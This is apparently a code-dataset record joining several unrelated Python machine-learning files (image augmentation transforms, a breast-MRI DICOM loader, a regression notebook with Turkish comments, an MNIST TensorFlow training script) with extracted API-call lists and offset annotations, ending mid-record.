    Mutates and returns the input PIL image.
    """
    size = int(level / magnitude * max_level)
    if size <= 0:
        return x
    w, h = x.size
    (top, left), (bottom, right) = _gen_cutout_coord(h, w, size)
    pixels = x.load()
    for i in range(top, bottom):
        for j in range(left, right):
            pixels[i, j] = (127, 127, 127, 0)
    return x
def _gen_cutout_coord(height, width, size):
height_loc = random.randint(0, height - 1)
width_loc = random.randint(0, width - 1)
upper_coord = (max(0, height_loc - size // 2),
max(0, width_loc - size // 2))
lower_coord = (min(height, height_loc + size // 2),
min(width, width_loc + size // 2))
return upper_coord, lower_coord
"""
For torch.Tensor
"""
class TorchCutout:
    """Zero out a randomly placed square of side `size` in a CHW tensor."""
    def __init__(self, size=16):
        self.size = size

    def __call__(self, img):
        h, w = img.shape[-2:]
        (top, left), (bottom, right) = _gen_cutout_coord(h, w, self.size)
        assert bottom - top > 0
        assert right - left > 0
        mask = torch.ones_like(img)
        mask[:, top:bottom, left:right] = torch.zeros((img.shape[0], bottom - top, right - left))
        return img * mask

    def __repr__(self):
        return f"TorchCutout(size={self.size})"
class GaussianNoise:
    """Additive zero-mean Gaussian noise with standard deviation `std`."""
    def __init__(self, std=0.15):
        self.std = std

    def __call__(self, x):
        with torch.no_grad():
            noise = torch.randn_like(x) * self.std
            return x + noise

    def __repr__(self):
        return f"GaussianNoise(std={self.std})"
class BatchRandomFlip:
    """Mirror each image of a batch along the width axis, independently.

    An image flips when a uniform draw exceeds ``flip_prob`` (i.e. with
    probability 1 - flip_prob).
    """
    def __init__(self, flip_prob=0.5):
        self.p = flip_prob

    def __call__(self, x):
        with torch.no_grad():
            flipped = [torch.flip(img, (-1,)) if random.random() > self.p else img
                       for img in x]
            return torch.stack(flipped, 0)

    def __repr__(self):
        return f"BatchRandomFlip(flip_prob={self.p})"
class RandomFlip:
    """Mirror a single image along its last axis when a uniform draw exceeds flip_prob."""
    def __init__(self, flip_prob=0.5):
        self.p = flip_prob

    def __call__(self, x):
        do_flip = random.random() > self.p
        return torch.flip(x, (-1,)) if do_flip else x

    def __repr__(self):
        return f"RandomFlip(flip_prob={self.p})"
class BatchRandomCrop:
    """Reflect-pad a NCHW batch, then take an independent random crop per image."""
    def __init__(self, padding=4):
        self.pad = padding

    def __call__(self, x):
        with torch.no_grad():
            b, _, h, w = x.shape
            padded = F.pad(x, [self.pad] * 4, mode="reflect")
            offs_a = torch.randint(0, 1 + self.pad * 2, (b,))
            offs_b = torch.randint(0, 1 + self.pad * 2, (b,))
            crops = [img[..., t:t + h, l:l + w]
                     for img, t, l in zip(padded, offs_a, offs_b)]
            return torch.stack(crops, 0)

    def __repr__(self):
        return f"BatchRandomCrop(padding={self.pad})"
class RandomCrop:
    """Reflect-pad a single CHW image and take one random crop of the original size."""
    def __init__(self, padding=4):
        self.pad = padding

    def __call__(self, x):
        with torch.no_grad():
            _, h, w = x.shape
            padded = F.pad(x[None], [self.pad] * 4, mode="reflect")
            left = random.randint(0, self.pad * 2)
            top = random.randint(0, self.pad * 2)
            return padded[0, :, top:top + h, left:left + w]

    def __repr__(self):
        return f"RandomCrop(padding={self.pad})"
class ZCA:
    """Flatten, centre and multiply by a precomputed whitening matrix, then restore shape."""
    def __init__(self, mean, scale):
        # mean and scale arrive as numpy arrays; keep them as float32 tensors
        self.mean = torch.from_numpy(mean).float()
        self.scale = torch.from_numpy(scale).float()

    def __call__(self, x):
        c, h, w = x.shape
        flat = x.reshape(-1)
        whitened = (flat - self.mean) @ self.scale
        return whitened.reshape(c, h, w)

    def __repr__(self):
        return "ZCA()"
class GCN:
    """Global contrast normalization for a single tensor.

    Centres the input, scales it to unit L2 norm (norms below ``eps`` are
    treated as 1 to avoid division by ~0), and multiplies by ``multiplier``.

    Fix over the original: the input tensor is no longer mutated in place
    (``x -= x.mean()`` modified the caller's tensor); a new tensor is returned.
    """
    def __init__(self, multiplier=55, eps=1e-10):
        self.multiplier = multiplier
        self.eps = eps

    def __call__(self, x):
        centered = x - x.mean()  # out-of-place: leave the caller's tensor intact
        norm = centered.norm(2)
        # Guard against division by ~0 for (near-)constant inputs.
        if norm.item() < self.eps:
            norm = torch.ones_like(norm)
        return self.multiplier * centered / norm

    def __repr__(self):
        return f"GCN(multiplier={self.multiplier}, eps={self.eps})"
"""
For numpy.array
"""
def numpy_batch_gcn(images, multiplier=55, eps=1e-10):
    """Global contrast normalization over a batch of images (batch axis first).

    Each image is mean-centred and scaled to unit L2 norm (norms below
    ``eps`` are treated as 1), then multiplied by ``multiplier``.

    Fix over the original: ``np.float`` was removed in NumPy 1.24, so the cast
    now uses the concrete ``np.float64`` dtype (same behaviour on older NumPy).
    """
    images = images.astype(np.float64)  # astype copies, so the caller's array is untouched
    images -= images.mean(axis=(1, 2, 3), keepdims=True)
    per_image_norm = np.sqrt(np.square(images).sum((1, 2, 3), keepdims=True))
    per_image_norm[per_image_norm < eps] = 1
    return multiplier * images / per_image_norm
| [
"torch.ones_like",
"torch.flip",
"PIL.ImageEnhance.Brightness",
"torch.randint",
"random.randint",
"torch.randn_like",
"PIL.ImageEnhance.Color",
"numpy.square",
"PIL.ImageEnhance.Contrast",
"random.random",
"PIL.ImageEnhance.Sharpness",
"torch.zeros",
"torch.no_grad",
"torch.from_numpy"
] | [((3245, 3274), 'random.randint', 'random.randint', (['(0)', '(height - 1)'], {}), '(0, height - 1)\n', (3259, 3274), False, 'import random\n'), ((3291, 3319), 'random.randint', 'random.randint', (['(0)', '(width - 1)'], {}), '(0, width - 1)\n', (3305, 3319), False, 'import random\n'), ((1349, 1364), 'random.random', 'random.random', ([], {}), '()\n', (1362, 1364), False, 'import random\n'), ((1722, 1737), 'random.random', 'random.random', ([], {}), '()\n', (1735, 1737), False, 'import random\n'), ((1959, 1974), 'random.random', 'random.random', ([], {}), '()\n', (1972, 1974), False, 'import random\n'), ((2401, 2416), 'random.random', 'random.random', ([], {}), '()\n', (2414, 2416), False, 'import random\n'), ((2646, 2661), 'random.random', 'random.random', ([], {}), '()\n', (2659, 2661), False, 'import random\n'), ((3991, 4011), 'torch.ones_like', 'torch.ones_like', (['img'], {}), '(img)\n', (4006, 4011), False, 'import torch\n'), ((4028, 4080), 'torch.zeros', 'torch.zeros', (['(img.shape[0], mask_height, mask_width)'], {}), '((img.shape[0], mask_height, mask_width))\n', (4039, 4080), False, 'import torch\n'), ((403, 429), 'PIL.ImageEnhance.Brightness', 'ImageEnhance.Brightness', (['x'], {}), '(x)\n', (426, 429), False, 'from PIL import ImageOps, ImageEnhance, ImageFilter, Image\n'), ((575, 596), 'PIL.ImageEnhance.Color', 'ImageEnhance.Color', (['x'], {}), '(x)\n', (593, 596), False, 'from PIL import ImageOps, ImageEnhance, ImageFilter, Image\n'), ((745, 769), 'PIL.ImageEnhance.Contrast', 'ImageEnhance.Contrast', (['x'], {}), '(x)\n', (766, 769), False, 'from PIL import ImageOps, ImageEnhance, ImageFilter, Image\n'), ((1559, 1584), 'PIL.ImageEnhance.Sharpness', 'ImageEnhance.Sharpness', (['x'], {}), '(x)\n', (1581, 1584), False, 'from PIL import ImageOps, ImageEnhance, ImageFilter, Image\n'), ((4387, 4402), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (4400, 4402), False, 'import torch\n'), ((4663, 4678), 'torch.no_grad', 'torch.no_grad', ([], {}), 
'()\n', (4676, 4678), False, 'import torch\n'), ((5072, 5087), 'random.random', 'random.random', ([], {}), '()\n', (5085, 5087), False, 'import random\n'), ((5117, 5137), 'torch.flip', 'torch.flip', (['x', '(-1,)'], {}), '(x, (-1,))\n', (5127, 5137), False, 'import torch\n'), ((5357, 5372), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (5370, 5372), False, 'import torch\n'), ((5920, 5935), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (5933, 5935), False, 'import torch\n'), ((5502, 5542), 'torch.randint', 'torch.randint', (['(0)', '(1 + self.pad * 2)', '(b,)'], {}), '(0, 1 + self.pad * 2, (b,))\n', (5515, 5542), False, 'import torch\n'), ((5540, 5580), 'torch.randint', 'torch.randint', (['(0)', '(1 + self.pad * 2)', '(b,)'], {}), '(0, 1 + self.pad * 2, (b,))\n', (5553, 5580), False, 'import torch\n'), ((6068, 6099), 'random.randint', 'random.randint', (['(0)', '(self.pad * 2)'], {}), '(0, self.pad * 2)\n', (6082, 6099), False, 'import random\n'), ((6099, 6130), 'random.randint', 'random.randint', (['(0)', '(self.pad * 2)'], {}), '(0, self.pad * 2)\n', (6113, 6130), False, 'import random\n'), ((6324, 6346), 'torch.from_numpy', 'torch.from_numpy', (['mean'], {}), '(mean)\n', (6340, 6346), False, 'import torch\n'), ((6376, 6399), 'torch.from_numpy', 'torch.from_numpy', (['scale'], {}), '(scale)\n', (6392, 6399), False, 'import torch\n'), ((7257, 7274), 'numpy.square', 'np.square', (['images'], {}), '(images)\n', (7266, 7274), True, 'import numpy as np\n'), ((4427, 4446), 'torch.randn_like', 'torch.randn_like', (['x'], {}), '(x)\n', (4443, 4446), False, 'import torch\n'), ((4729, 4751), 'torch.flip', 'torch.flip', (['img', '(-1,)'], {}), '(img, (-1,))\n', (4739, 4751), False, 'import torch\n'), ((4771, 4786), 'random.random', 'random.random', ([], {}), '()\n', (4784, 4786), False, 'import random\n')] |
import torchio
import os
import numpy as np
import pydicom as dicom
import time
import torch
import random
import math
import tensorflow as tf
prev_time = time.time()
os.environ["KMP_DUPLICATE_LIB_OK"]="TRUE"
imgs_shape = (512, 512)
crop_shape = (128, 128)
load_dir = 'C:/Users/trist/cs_projects/Cancer_Project/Cancer Imagery/manifest-1621548522717/Duke-Breast-Cancer-MRI'
load_paths = list()
for (dirpath, dirnames, filenames) in os.walk(load_dir):
load_paths += [os.path.join(dirpath, file) for file in filenames]
# get random subset of list
percent_sample = 100
total_imgs = len(load_paths) * (percent_sample*0.01)
# round down
total_imgs = math.floor(total_imgs)
new_path_list = []
i = 0
while i < total_imgs:
rand_choice = random.choice(load_paths)
if rand_choice not in new_path_list:
new_path_list.append(rand_choice)
i = i + 1
load_paths = new_path_list
img_list = []
for path in load_paths:
try:
img = dicom.dcmread(path)
img_shape = img.pixel_array.shape
id = img.PatientID
if img_shape == imgs_shape:
for c in id:
if not c.isdigit():
id = id.replace(c, '')
subject_dict = {
'one image': torchio.ScalarImage(path),
'id': id
}
subject = torchio.Subject(subject_dict)
img_list.append(subject)
except:
print('image ' + str(path) + ' could not be loaded')
dataset = torchio.SubjectsDataset(img_list)
print('Total length of dataset: ' + str(len(dataset)))
device = torch.device("cpu")
img_array = np.empty(shape=(len(dataset), (crop_shape[0]*crop_shape[1])+1), dtype=np.int8)
for i in range(len(dataset)):
loader = torch.utils.data.DataLoader(dataset, shuffle=True)
id = torch.tensor([int(next(iter(loader))['id'][0])])
image = next(iter(loader))['one image']['data']
image = image.numpy()
# crop image
image = tf.image.random_crop(value=image, size=(1, 1, crop_shape[0], crop_shape[1], 1))
image = image.numpy()
image = image.flatten()
image = np.append(image, id)
img_array[i] = image
np.save('converted_imgs/img_array.npy', img_array)
after_time = time.time()
load_time = after_time - prev_time
print(load_time)
| [
"tensorflow.image.random_crop",
"pydicom.dcmread",
"numpy.save",
"torch.utils.data.DataLoader",
"os.walk",
"math.floor",
"random.choice",
"torchio.SubjectsDataset",
"time.time",
"torchio.Subject",
"numpy.append",
"torchio.ScalarImage",
"torch.device",
"os.path.join"
] | [((156, 167), 'time.time', 'time.time', ([], {}), '()\n', (165, 167), False, 'import time\n'), ((436, 453), 'os.walk', 'os.walk', (['load_dir'], {}), '(load_dir)\n', (443, 453), False, 'import os\n'), ((655, 677), 'math.floor', 'math.floor', (['total_imgs'], {}), '(total_imgs)\n', (665, 677), False, 'import math\n'), ((1495, 1528), 'torchio.SubjectsDataset', 'torchio.SubjectsDataset', (['img_list'], {}), '(img_list)\n', (1518, 1528), False, 'import torchio\n'), ((1594, 1613), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (1606, 1613), False, 'import torch\n'), ((2167, 2217), 'numpy.save', 'np.save', (['"""converted_imgs/img_array.npy"""', 'img_array'], {}), "('converted_imgs/img_array.npy', img_array)\n", (2174, 2217), True, 'import numpy as np\n'), ((2232, 2243), 'time.time', 'time.time', ([], {}), '()\n', (2241, 2243), False, 'import time\n'), ((744, 769), 'random.choice', 'random.choice', (['load_paths'], {}), '(load_paths)\n', (757, 769), False, 'import random\n'), ((1751, 1801), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['dataset'], {'shuffle': '(True)'}), '(dataset, shuffle=True)\n', (1778, 1801), False, 'import torch\n'), ((1970, 2049), 'tensorflow.image.random_crop', 'tf.image.random_crop', ([], {'value': 'image', 'size': '(1, 1, crop_shape[0], crop_shape[1], 1)'}), '(value=image, size=(1, 1, crop_shape[0], crop_shape[1], 1))\n', (1990, 2049), True, 'import tensorflow as tf\n'), ((2119, 2139), 'numpy.append', 'np.append', (['image', 'id'], {}), '(image, id)\n', (2128, 2139), True, 'import numpy as np\n'), ((474, 501), 'os.path.join', 'os.path.join', (['dirpath', 'file'], {}), '(dirpath, file)\n', (486, 501), False, 'import os\n'), ((964, 983), 'pydicom.dcmread', 'dicom.dcmread', (['path'], {}), '(path)\n', (977, 983), True, 'import pydicom as dicom\n'), ((1342, 1371), 'torchio.Subject', 'torchio.Subject', (['subject_dict'], {}), '(subject_dict)\n', (1357, 1371), False, 'import torchio\n'), ((1253, 1278), 
'torchio.ScalarImage', 'torchio.ScalarImage', (['path'], {}), '(path)\n', (1272, 1278), False, 'import torchio\n')] |
# -*- coding: utf-8 -*-
"""multilinearRegression.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1OSTS53kURF8OctaWn6l88Wlur2FKP2sp
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
veriler = pd.read_csv('/content/veriler.csv')
ulke = veriler.iloc[:,0:1].values
sayisalVeriler = veriler.iloc[:, 1:4]
c = veriler.iloc[:, 4:5].values
c
from sklearn import preprocessing
le = preprocessing.LabelEncoder()
c[:, 0] = le.fit_transform(veriler.iloc[:, -1])
ulke[:, 0] = le.fit_transform(veriler.iloc[:, 0:1])
ohe = preprocessing.OneHotEncoder()
c = ohe.fit_transform(c).toarray()
ulke = ohe.fit_transform(ulke).toarray()
sonuc1 = pd.DataFrame(data=ulke, index=range(len(ulke)), columns=['fr', 'tr', 'us'])
sonuc2 = pd.DataFrame(data=sayisalVeriler, index=range(len(sayisalVeriler)), columns= ['boy', 'kilo', 'yas'])
sCin = pd.DataFrame(data=c[:, 0:1], index = range(len(c[:, 0:1])), columns = ['Cinsiyet'])
s1 = pd.concat([sonuc1, sonuc2], axis=1) # satir satira birlestirmek icin yani yatay boyutta birlestirmek icin axis = 1
s2 = pd.concat([s1, sCin], axis=1)
s2
from sklearn.model_selection import train_test_split
# verinin yuzde 66 si antrenman icin kullanilsin kalan yuzde 33'u test edilsin diye ayrdik
# random_state rastsal ayirma icin kullaniliyor ayni degeri alan her kod ayni ayrimi yapar
x_train, x_test, y_train, y_test = train_test_split(s1, sCin, test_size = 0.33, random_state = 0)
x_train
y_train
x_test
y_test
from sklearn.linear_model import LinearRegression
multile = LinearRegression()
multile.fit(x_train, y_train)
y_predict = multile.predict(x_test)
y_test.values
y_predict
boy = s2.iloc[:, 3:4].values
sol = s2.iloc[:,:3]
sag = s2.iloc[:,4:]
yeniVeriler = pd.concat([sol, sag], axis = 1)
yeniVeriler
x_train, x_test, y_train, y_test = train_test_split(yeniVeriler, boy, test_size = 0.33, random_state = 0)
multile2 = LinearRegression()
multile2.fit(x_train, y_train)
y_predict2 = multile2.predict(x_test)
y_predict2
y_test
"""Multilineer regresyoda ki B0 degerini 1 olarak ```yeniVerilerin``` basina ekledik. Bunuda ```X```'e attik."""
X = np.append(arr = np.ones((22,1)).astype(int), values = yeniVeriler, axis = 1)
X
"""# Backward Elimination Algorithm
> Bu algoritma oneNotaki notalara bakarak nalasilabilir.
> Kisaca OLS raporundan aldigimiz olasik degerlerine bakarak ve Backward Elimination algoritmasina dayanarak 0.05 aldigimiz P degerinden yuksek degerleri sirasiyla kontrol ederek eliyoruz ta ki P < 0.05 olana kadar.
> Burada boy bagimli degisken ve bagimsiz degiskenleri ```yeniVeriler``` tablosundan cekip 0.05 den buyuk olanlari eledik.
"""
import statsmodels.api as sm
X_1 = yeniVeriler.iloc[:, [0, 1, 2, 3, 4, 5]].values
X_1 = np.array(X_1, dtype = float)
model = sm.OLS(boy, X_1).fit()
model.summary()
X_1 = yeniVeriler.iloc[:, [0, 1, 2, 3, 5]].values
X_1 = np.array(X_1, dtype = float)
model = sm.OLS(boy, X_1).fit()
model.summary()
X_1 = yeniVeriler.iloc[:, [0, 1, 2, 3]].values
X_1 = np.array(X_1, dtype = float)
model = sm.OLS(boy, X_1).fit()
model.summary()
| [
"statsmodels.api.OLS",
"pandas.read_csv",
"sklearn.model_selection.train_test_split",
"sklearn.preprocessing.OneHotEncoder",
"numpy.ones",
"sklearn.preprocessing.LabelEncoder",
"sklearn.linear_model.LinearRegression",
"numpy.array",
"pandas.concat"
] | [((291, 326), 'pandas.read_csv', 'pd.read_csv', (['"""/content/veriler.csv"""'], {}), "('/content/veriler.csv')\n", (302, 326), True, 'import pandas as pd\n'), ((477, 505), 'sklearn.preprocessing.LabelEncoder', 'preprocessing.LabelEncoder', ([], {}), '()\n', (503, 505), False, 'from sklearn import preprocessing\n'), ((615, 644), 'sklearn.preprocessing.OneHotEncoder', 'preprocessing.OneHotEncoder', ([], {}), '()\n', (642, 644), False, 'from sklearn import preprocessing\n'), ((1018, 1053), 'pandas.concat', 'pd.concat', (['[sonuc1, sonuc2]'], {'axis': '(1)'}), '([sonuc1, sonuc2], axis=1)\n', (1027, 1053), True, 'import pandas as pd\n'), ((1139, 1168), 'pandas.concat', 'pd.concat', (['[s1, sCin]'], {'axis': '(1)'}), '([s1, sCin], axis=1)\n', (1148, 1168), True, 'import pandas as pd\n'), ((1445, 1503), 'sklearn.model_selection.train_test_split', 'train_test_split', (['s1', 'sCin'], {'test_size': '(0.33)', 'random_state': '(0)'}), '(s1, sCin, test_size=0.33, random_state=0)\n', (1461, 1503), False, 'from sklearn.model_selection import train_test_split\n'), ((1604, 1622), 'sklearn.linear_model.LinearRegression', 'LinearRegression', ([], {}), '()\n', (1620, 1622), False, 'from sklearn.linear_model import LinearRegression\n'), ((1804, 1833), 'pandas.concat', 'pd.concat', (['[sol, sag]'], {'axis': '(1)'}), '([sol, sag], axis=1)\n', (1813, 1833), True, 'import pandas as pd\n'), ((1885, 1951), 'sklearn.model_selection.train_test_split', 'train_test_split', (['yeniVeriler', 'boy'], {'test_size': '(0.33)', 'random_state': '(0)'}), '(yeniVeriler, boy, test_size=0.33, random_state=0)\n', (1901, 1951), False, 'from sklearn.model_selection import train_test_split\n'), ((1968, 1986), 'sklearn.linear_model.LinearRegression', 'LinearRegression', ([], {}), '()\n', (1984, 1986), False, 'from sklearn.linear_model import LinearRegression\n'), ((2810, 2836), 'numpy.array', 'np.array', (['X_1'], {'dtype': 'float'}), '(X_1, dtype=float)\n', (2818, 2836), True, 'import numpy as np\n'), 
((2946, 2972), 'numpy.array', 'np.array', (['X_1'], {'dtype': 'float'}), '(X_1, dtype=float)\n', (2954, 2972), True, 'import numpy as np\n'), ((3079, 3105), 'numpy.array', 'np.array', (['X_1'], {'dtype': 'float'}), '(X_1, dtype=float)\n', (3087, 3105), True, 'import numpy as np\n'), ((2848, 2864), 'statsmodels.api.OLS', 'sm.OLS', (['boy', 'X_1'], {}), '(boy, X_1)\n', (2854, 2864), True, 'import statsmodels.api as sm\n'), ((2984, 3000), 'statsmodels.api.OLS', 'sm.OLS', (['boy', 'X_1'], {}), '(boy, X_1)\n', (2990, 3000), True, 'import statsmodels.api as sm\n'), ((3117, 3133), 'statsmodels.api.OLS', 'sm.OLS', (['boy', 'X_1'], {}), '(boy, X_1)\n', (3123, 3133), True, 'import statsmodels.api as sm\n'), ((2213, 2229), 'numpy.ones', 'np.ones', (['(22, 1)'], {}), '((22, 1))\n', (2220, 2229), True, 'import numpy as np\n')] |
import tensorflow as tf
import numpy as np
import os
import time
from tensorflow.contrib.tensorboard.plugins import projector
slim = tf.contrib.slim
from MNIST_Classification_with_embedding import Classification_Model
from tensorflow.examples.tutorials.mnist import input_data
def main(_):
tf.logging.set_verbosity(tf.logging.DEBUG)
tfrecords_path = './data_tf/'
iteration = 50000
with tf.Graph().as_default():
mnist = input_data.read_data_sets('MNIST_data', one_hot=True)
is_training = tf.placeholder(tf.bool)
ckpt = tf.train.get_checkpoint_state(os.path.dirname('./checkpoint_pretrain/checkpoint'))
sess = tf.InteractiveSession()
global_step = slim.create_global_step()
summaries = set(tf.get_collection(tf.GraphKeys.SUMMARIES))
mnist_net = Classification_Model()
x,y_ = mnist_net.get_batch_tf(tfrecords_path)
# x = tf.placeholder(tf.float32, [None, 28, 28, 1], name='x-input')
# y_ = tf.placeholder(tf.float32, [None, 10], name='y-input')
# arg_scope = mnist_net.model_arg_scope()
end_points = {}
# with slim.arg_scope(arg_scope):
logits, end_points = mnist_net.net(x, is_training = is_training, reuse = None)
extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(extra_update_ops):
losses = mnist_net.losses(logits, y_)
train_step = mnist_net.optimizer(0.001).minimize(losses, global_step=global_step)
embedding, config = mnist_net.get_embedding('./checkpoint_pretrain/')
#total_loss = tf.losses.get_total_loss()
summaries.add(tf.summary.image("img", tf.cast(x, tf.float32)))
summaries.add(tf.summary.scalar('loss', losses))
for variable in tf.trainable_variables():
summaries.add(tf.summary.histogram(variable.op.name, variable))
train_writer = tf.summary.FileWriter('./checkpoint_pretrain/',
sess.graph)
projector.visualize_embeddings(train_writer, config)
correct_prediction = tf.equal(tf.argmax(end_points['Predictions'], 1), tf.argmax(y_, 1))
train_num_correct = tf.reduce_sum(tf.cast(correct_prediction, tf.float32))
accuracy = train_num_correct / mnist_net.batch_size
#accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
summaries.add(tf.summary.scalar('accuracy', accuracy))
summary_op = tf.summary.merge(list(summaries), name='summary_op')
sess.run(tf.global_variables_initializer())
sess.run(tf.local_variables_initializer())
saver = tf.train.Saver(max_to_keep=5,
keep_checkpoint_every_n_hours=1.0,
write_version=2,
pad_step_number=False)
if ckpt and ckpt.model_checkpoint_path:
saver.restore(sess, ckpt.model_checkpoint_path)
x_test = tf.placeholder(tf.float32, shape=[None, 28, 28, 1])
y_test = tf.placeholder(tf.float32, shape=[None, 10])
test_is_training = tf.placeholder(tf.bool)
logits_test, end_points_test = mnist_net.net(x_test, is_training = test_is_training, reuse = True)
correct_prediction_test = tf.equal(tf.argmax(end_points_test['Predictions'], 1), tf.argmax(y_test, 1))
#accuracy_test = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
num_correct = tf.reduce_sum(tf.cast(correct_prediction_test, tf.float32))
assignment = embedding.assign(end_points_test['Features'])
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(coord=coord)
for i in range(iteration):
batch = mnist.train.next_batch(mnist_net.batch_size)
_,summary_str = sess.run([train_step,summary_op], feed_dict={is_training : True})
#_,summary_str = sess.run([train_step,summary_op], feed_dict={x: np.reshape(batch[0], (-1, 28, 28, 1)), y_:batch[1], is_training : True})
if i %100 == 0:
global_step_str = global_step.eval()
train_writer.add_summary(summary_str, global_step_str)
#print('%diteration'%global_step_str,sess.run(accuracy, feed_dict={is_training : True}))
print('####################################')
variables = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)
if i % 1000 == 0:
sum_accuracy_test = 0.0
test_batch_x = mnist.test.images[:10000] * 2.0 - 1
test_batch_y = mnist.test.labels[:10000]
accuracy_test_str, _ = sess.run([num_correct, assignment],
feed_dict={x_test: np.reshape(test_batch_x, (-1, 28, 28, 1)), y_test: test_batch_y, test_is_training: False})
sum_accuracy_test += accuracy_test_str
print ("test accuracy is: %f" % (sum_accuracy_test /10000.0 ))
saver.save(sess, "./checkpoint_pretrain/",global_step=global_step_str)
coord.request_stop()
coord.join(threads)
time.sleep(3)
if __name__ == '__main__':
tf.app.run()
| [
"tensorflow.train.Coordinator",
"tensorflow.trainable_variables",
"tensorflow.get_collection",
"tensorflow.logging.set_verbosity",
"tensorflow.local_variables_initializer",
"tensorflow.InteractiveSession",
"tensorflow.contrib.tensorboard.plugins.projector.visualize_embeddings",
"os.path.dirname",
"t... | [((300, 342), 'tensorflow.logging.set_verbosity', 'tf.logging.set_verbosity', (['tf.logging.DEBUG'], {}), '(tf.logging.DEBUG)\n', (324, 342), True, 'import tensorflow as tf\n'), ((5188, 5200), 'tensorflow.app.run', 'tf.app.run', ([], {}), '()\n', (5198, 5200), True, 'import tensorflow as tf\n'), ((451, 504), 'tensorflow.examples.tutorials.mnist.input_data.read_data_sets', 'input_data.read_data_sets', (['"""MNIST_data"""'], {'one_hot': '(True)'}), "('MNIST_data', one_hot=True)\n", (476, 504), False, 'from tensorflow.examples.tutorials.mnist import input_data\n'), ((527, 550), 'tensorflow.placeholder', 'tf.placeholder', (['tf.bool'], {}), '(tf.bool)\n', (541, 550), True, 'import tensorflow as tf\n'), ((666, 689), 'tensorflow.InteractiveSession', 'tf.InteractiveSession', ([], {}), '()\n', (687, 689), True, 'import tensorflow as tf\n'), ((827, 849), 'MNIST_Classification_with_embedding.Classification_Model', 'Classification_Model', ([], {}), '()\n', (847, 849), False, 'from MNIST_Classification_with_embedding import Classification_Model\n'), ((1282, 1324), 'tensorflow.get_collection', 'tf.get_collection', (['tf.GraphKeys.UPDATE_OPS'], {}), '(tf.GraphKeys.UPDATE_OPS)\n', (1299, 1324), True, 'import tensorflow as tf\n'), ((1807, 1831), 'tensorflow.trainable_variables', 'tf.trainable_variables', ([], {}), '()\n', (1829, 1831), True, 'import tensorflow as tf\n'), ((1932, 1991), 'tensorflow.summary.FileWriter', 'tf.summary.FileWriter', (['"""./checkpoint_pretrain/"""', 'sess.graph'], {}), "('./checkpoint_pretrain/', sess.graph)\n", (1953, 1991), True, 'import tensorflow as tf\n'), ((2046, 2098), 'tensorflow.contrib.tensorboard.plugins.projector.visualize_embeddings', 'projector.visualize_embeddings', (['train_writer', 'config'], {}), '(train_writer, config)\n', (2076, 2098), False, 'from tensorflow.contrib.tensorboard.plugins import projector\n'), ((2673, 2781), 'tensorflow.train.Saver', 'tf.train.Saver', ([], {'max_to_keep': '(5)', 'keep_checkpoint_every_n_hours': 
'(1.0)', 'write_version': '(2)', 'pad_step_number': '(False)'}), '(max_to_keep=5, keep_checkpoint_every_n_hours=1.0,\n write_version=2, pad_step_number=False)\n', (2687, 2781), True, 'import tensorflow as tf\n'), ((2998, 3049), 'tensorflow.placeholder', 'tf.placeholder', (['tf.float32'], {'shape': '[None, 28, 28, 1]'}), '(tf.float32, shape=[None, 28, 28, 1])\n', (3012, 3049), True, 'import tensorflow as tf\n'), ((3067, 3111), 'tensorflow.placeholder', 'tf.placeholder', (['tf.float32'], {'shape': '[None, 10]'}), '(tf.float32, shape=[None, 10])\n', (3081, 3111), True, 'import tensorflow as tf\n'), ((3139, 3162), 'tensorflow.placeholder', 'tf.placeholder', (['tf.bool'], {}), '(tf.bool)\n', (3153, 3162), True, 'import tensorflow as tf\n'), ((3629, 3651), 'tensorflow.train.Coordinator', 'tf.train.Coordinator', ([], {}), '()\n', (3649, 3651), True, 'import tensorflow as tf\n'), ((3670, 3711), 'tensorflow.train.start_queue_runners', 'tf.train.start_queue_runners', ([], {'coord': 'coord'}), '(coord=coord)\n', (3698, 3711), True, 'import tensorflow as tf\n'), ((5142, 5155), 'time.sleep', 'time.sleep', (['(3)'], {}), '(3)\n', (5152, 5155), False, 'import time\n'), ((597, 648), 'os.path.dirname', 'os.path.dirname', (['"""./checkpoint_pretrain/checkpoint"""'], {}), "('./checkpoint_pretrain/checkpoint')\n", (612, 648), False, 'import os\n'), ((763, 804), 'tensorflow.get_collection', 'tf.get_collection', (['tf.GraphKeys.SUMMARIES'], {}), '(tf.GraphKeys.SUMMARIES)\n', (780, 804), True, 'import tensorflow as tf\n'), ((1338, 1379), 'tensorflow.control_dependencies', 'tf.control_dependencies', (['extra_update_ops'], {}), '(extra_update_ops)\n', (1361, 1379), True, 'import tensorflow as tf\n'), ((1747, 1780), 'tensorflow.summary.scalar', 'tf.summary.scalar', (['"""loss"""', 'losses'], {}), "('loss', losses)\n", (1764, 1780), True, 'import tensorflow as tf\n'), ((2138, 2177), 'tensorflow.argmax', 'tf.argmax', (["end_points['Predictions']", '(1)'], {}), "(end_points['Predictions'], 
1)\n", (2147, 2177), True, 'import tensorflow as tf\n'), ((2179, 2195), 'tensorflow.argmax', 'tf.argmax', (['y_', '(1)'], {}), '(y_, 1)\n', (2188, 2195), True, 'import tensorflow as tf\n'), ((2239, 2278), 'tensorflow.cast', 'tf.cast', (['correct_prediction', 'tf.float32'], {}), '(correct_prediction, tf.float32)\n', (2246, 2278), True, 'import tensorflow as tf\n'), ((2438, 2477), 'tensorflow.summary.scalar', 'tf.summary.scalar', (['"""accuracy"""', 'accuracy'], {}), "('accuracy', accuracy)\n", (2455, 2477), True, 'import tensorflow as tf\n'), ((2571, 2604), 'tensorflow.global_variables_initializer', 'tf.global_variables_initializer', ([], {}), '()\n', (2602, 2604), True, 'import tensorflow as tf\n'), ((2623, 2655), 'tensorflow.local_variables_initializer', 'tf.local_variables_initializer', ([], {}), '()\n', (2653, 2655), True, 'import tensorflow as tf\n'), ((3313, 3357), 'tensorflow.argmax', 'tf.argmax', (["end_points_test['Predictions']", '(1)'], {}), "(end_points_test['Predictions'], 1)\n", (3322, 3357), True, 'import tensorflow as 